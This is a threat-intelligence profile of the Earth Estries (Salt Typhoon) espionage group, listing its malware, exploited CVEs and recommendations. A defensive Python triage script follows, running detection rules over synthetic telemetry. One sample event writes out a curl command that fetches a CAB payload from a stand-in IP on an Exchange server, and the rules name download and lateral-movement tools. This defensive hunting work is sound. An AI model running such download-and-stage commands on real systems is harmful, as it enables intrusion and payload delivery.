| Category | Details |
|---|---|
| Threat Actors | Earth Estries – Aliases: FamousSparrow, GhostEmperor, Salt Typhoon, UNC2286 |
| Campaign Overview | Long-running cyber espionage campaigns – Targets critical infrastructure, government entities and key industries worldwide |
| Target Regions | United States – Germany – South Africa – Malaysia – Philippines – Taiwan – India – Canada – Singapore |
| Methodology | Two parallel attack chains (payloads delivered as CAB archives or fetched with cURL) – Exploitation of vulnerabilities in internet-facing systems such as Microsoft Exchange Server – Keylogging – DLL sideloading – Memory-resident (fileless) malware stages |
| Products Targeted | Microsoft Exchange Server – Ivanti Connect Secure – Fortinet FortiClient EMS – Sophos Firewall – IoT devices – Virtual Private Servers (VPS) – Windows systems |
| Malware | HemiGate – GhostSpider – Zingdoor – Cobalt Strike – MASOL RAT – SNAPPYBEE – Demodex rootkit |
| Tools and Delivery | PsExec (lateral movement) – TrillClient – Crowdoor – CAB archives and cURL for payload delivery – Encrypted C&C channels – Anonymized file-sharing services for exfiltration |
| Vulnerabilities Exploited | CVE-2023-46805 (Ivanti Connect Secure authentication bypass) – CVE-2024-21887 (Ivanti Connect Secure command injection) – CVE-2023-48788 (Fortinet FortiClient EMS SQL injection) – Further exploits against Microsoft Exchange Server and Sophos Firewall, not identified by CVE in the source |
| TTPs | Data exfiltration via anonymized file-sharing services – Prolonged persistence using modular malware – Encrypted traffic for stealth – In-memory execution to evade disk-based detection – Exploitation of N-day vulnerabilities in internet-facing products |
| Attribution | Earth Estries – Suspected to be a China-based APT group |
| Recommendations | Patch the Ivanti, Fortinet, Exchange and Sophos products above against the vulnerabilities listed – Monitor for persistence mechanisms and lateral movement (e.g. PsExec service installs) – Deploy behaviour-based (EDR) detection, since in-memory stages leave little on disk – Hunt for in-memory malware and encrypted C&C traffic |
| Source | CYFIRMA |
Read full article: https://www.cyfirma.com/research/apt-profile-earth-estries/
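The methodology and recommendation rows above name four host-level behaviours a defender can actually hunt for: cURL downloads launched from a compromised server process, CAB archives expanded into a staging directory, DLL sideloading, and PsExec-driven lateral movement. The script below is an added example, not CYFIRMA's or any vendor's code, that turns those four behaviours into simple triage rules and runs them over a handful of constructed Sysmon-style events embedded inline. The event field names, host names, paths, the list of commonly sideloaded DLL names and the URL are all assumptions made for illustration; none come from the source.

```python
"""Triage heuristics for the Earth Estries tradecraft summarised above.

The events below are constructed, synthetic telemetry (not from any real
incident). Field names loosely follow Sysmon event 1 (process create),
Sysmon event 7 (image load) and Windows System event 7045 (service
install). The rules are hunting heuristics, not vendor signatures.
"""
import ntpath
import re
from collections import Counter

# Server worker processes that should never spawn a download tool.
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe"}
# Directories any user can write to; payload staging here is a common pattern.
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\public\\", "c:\\windows\\temp\\")
# Generic DLL names often abused for sideloading (assumption, not from the source).
COMMON_SIDELOAD_DLLS = {"version.dll", "dbghelp.dll", "wtsapi32.dll", "msimg32.dll"}
SYSTEM_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/", re.I)

# Constructed sample telemetry: a mix of benign and suspicious events.
SAMPLE_EVENTS = [
    # Benign: an admin pulls a report from an internal host via a console.
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"curl.exe -o C:\Temp\report.csv http://intranet.corp/report.csv"},
    # Suspicious: curl spawned by an IIS worker on the Exchange server.
    {"id": 1, "host": "EXCH01", "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": r"curl.exe -s -o C:\ProgramData\update.cab http://203.0.113.7/u.cab"},
    # Suspicious: the downloaded CAB is expanded into ProgramData.
    {"id": 1, "host": "EXCH01", "image": r"C:\Windows\System32\expand.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"expand.exe C:\ProgramData\update.cab -F:* C:\ProgramData\svc"},
    # Suspicious: a dropped executable loads version.dll from its own directory.
    {"id": 7, "host": "EXCH01", "image": r"C:\ProgramData\svc\host.exe",
     "loaded": r"C:\ProgramData\svc\version.dll"},
    # Benign: the same DLL name loaded from System32.
    {"id": 7, "host": "WS01", "image": r"C:\Program Files\App\app.exe",
     "loaded": r"C:\Windows\System32\version.dll"},
    # Suspicious: PsExec service installed on a file server (lateral movement).
    {"id": 7045, "host": "FS01", "service": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe"},
    # Benign: a routine driver service installation.
    {"id": 7045, "host": "WS01", "service": "WdNisDrv",
     "image_path": r"system32\drivers\WdNisDrv.sys"},
]


def base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def rule_download_tool(ev):
    """curl.exe launched by a web worker, or fetching from a bare IP."""
    if ev["id"] != 1 or base(ev["image"]) != "curl.exe":
        return None
    parent = base(ev.get("parent", ""))
    if parent in WEB_WORKERS:
        return f"curl.exe spawned by web worker {parent}"
    if IP_URL.search(ev.get("cmdline", "")):
        return "curl.exe downloading from a bare IP address"
    return None


def rule_cab_expand(ev):
    """expand.exe/extrac32.exe unpacking a CAB into a user-writable directory."""
    if ev["id"] != 1 or base(ev["image"]) not in {"expand.exe", "extrac32.exe"}:
        return None
    cmd = ev.get("cmdline", "").lower()
    if ".cab" in cmd and any(d in cmd for d in USER_WRITABLE):
        return "CAB archive expanded into a user-writable directory"
    return None


def rule_dll_sideload(ev):
    """A commonly sideloaded DLL name resolved from outside the system directories."""
    if ev["id"] != 7:
        return None
    dll = ev["loaded"].lower()
    if base(dll) in COMMON_SIDELOAD_DLLS and not dll.startswith(SYSTEM_DLL_DIRS):
        return f"{base(dll)} loaded from {ntpath.dirname(dll)} by {base(ev['image'])}"
    return None


def rule_psexec_service(ev):
    """Service install event for the PsExec remote-execution service."""
    if ev["id"] != 7045:
        return None
    if ev.get("service", "").upper() == "PSEXESVC" or "psexesvc" in ev.get("image_path", "").lower():
        return "PsExec service installed (remote execution / lateral movement)"
    return None


RULES = [rule_download_tool, rule_cab_expand, rule_dll_sideload, rule_psexec_service]


def triage(events):
    """Run every rule over every event; return one alert per (event, rule) hit."""
    alerts = []
    for ev in events:
        for rule in RULES:
            detail = rule(ev)
            if detail:
                alerts.append({"host": ev["host"], "rule": rule.__name__, "detail": detail})
    return alerts


def hosts_by_alert_count(alerts):
    """Hosts ranked by number of hits; several hits on one host suggest a chain."""
    return Counter(a["host"] for a in alerts)


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a['host']}] {a['rule']}: {a['detail']}")
    print(hosts_by_alert_count(found))
```

Run against the sample, the script flags three events on EXCH01 (download, CAB expansion, sideload) and the PsExec service install on FS01, while the three benign events stay silent. The point of the host-level count is that the dual CAB/cURL chains described in the profile produce several weak signals on the same machine within a short window; correlating them per host is what turns individually noisy heuristics into a usable hunt.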
The above summary has been generated by an AI language model